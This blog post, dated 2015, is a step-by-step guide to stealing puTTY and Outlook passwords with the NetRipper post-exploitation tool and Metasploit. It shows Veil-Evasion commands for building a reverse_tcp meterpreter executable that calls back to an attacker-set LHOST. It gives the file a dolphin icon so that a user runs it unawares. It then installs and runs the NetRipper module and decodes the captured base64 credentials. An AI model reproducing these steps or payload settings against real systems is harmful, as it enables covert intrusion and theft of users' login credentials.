home // code //

08/14/2015 Sniffing Encrypted puTTY/Outlook Credentials with Metasploit/NetRipper “NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. NetRipper was released at Defcon 23, Las Vegas, Nevada.” – https://github.com/NytroRST/NetRipper NetRipper offers a standalone command line process injection method, for once you’ve exploited a windows machine and can upload/execute commands, but this post will cover a pre-compiled “malicious” executable method with a built-in meterpreter reverse_tcp shell. It should also be be noted that NetRipper is currently capable of injecting into, and capturing data from Firefox, Chrome, Lync (Skype for Business), puTTY, WinSCP, SQL Server Management and Microsoft Outlook. This post will cover puTTY and Outlook and does not require Administrator or SYSTEM privileges on the target. Exploitation (in this case) can be accomplished by: 1. Creating a “malicious” reverse_tcp shell-enabled executable with Veil-Evasion. User executes the file thinking that a cute dolphin will appear? 2. Exploiting a pre-existing vulnerability and getting a reverse shell by some other means. We’ll be focusing on the reverse_tcp shell-enabled executable method. Create the .exe with Veil-Evasion: use python/meterpreter/rev_tcp set LHOST 192.168.227.133 set LPORT 4444 set USE_PHYERION Y generate Set EXE base name and choose your payload creation method: Change the exe icon to a dolphin because dolphins are special. You can use Resource Hacker for that. Download NetRipper and configure it for metasploit: git clone https://github.com/NytroRST/NetRipper.git cd NetRipper cd Metasploit cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/ mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper g++ -Wall netripper.cpp -o netripper cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/ cd ../Release cp DLL.dll /usr/share/metasploit framework/modules/post/windows/gather/netripper/DLL.dll Setup up your metasploit listener and start it: Execute the payload on the target machine: Meterepreter session opened: Send meterpreter into the background so we can load our netripper module: meterpreter >background Load the netripper module, configure it, and run it: At this point, the injected processes are saving data to the temp directory defined by the TEMP environment variable on the target machine, in this case: [C:\Users\<user>\AppData\Local\Temp\NetRipper] Once the user opens up a puTTY session, the passwords and commands will be saved to: For the MS Outlook capture, you’ll be looking for a basic auth base64 encoded string: Decode the base64 and you have your creds! That's it!